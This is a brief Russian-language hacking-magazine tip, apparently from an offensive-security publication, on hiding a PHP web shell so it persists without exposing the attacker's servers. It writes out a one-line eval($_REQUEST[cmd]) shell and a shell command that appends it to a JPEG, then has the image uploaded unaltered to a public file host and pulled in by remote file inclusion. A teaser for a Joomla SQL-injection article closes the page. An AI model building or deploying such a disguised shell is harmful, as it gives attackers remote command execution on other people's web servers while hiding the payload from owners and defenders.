Я не буду описывать способы всем давно
известные (можно положить на свой сервер, на народ, на залитый
уже шелл), но есть способ, о котором мне еще слышать не
приходилось, — он позволяет хранить шелл достаточно долго и при
этом не палить свои сервера и шеллы. Заливать шелл будем на
файловый хостинг, который дает прямые линки на хранимые файлы.
Предложил использовать этот способ geezer_code.

1. Создаем
любое изображение.

$ echo "<?php eval($_REQUEST[cmd]);?>" >
simple_shell.php
$ cat 1.jpeg simple_shell.php >> poisoned.jpeg

Картинка готова к загрузке.

2. Загружаем ее без ресайзинга и любых других преобразований
(это важно), например, на
imageshack.us.

3. Теперь можно инклудить ее по прямой ссылке с
файлообменника.

Оставить мнение

Check Also

Кавычкой по «Джумле». Учимся проводить SQL-инъекцию второго порядка на примере уязвимости в Joomla

Joomla — вторая по популярности система управления сайтами после WordPress. Уязвимость, о …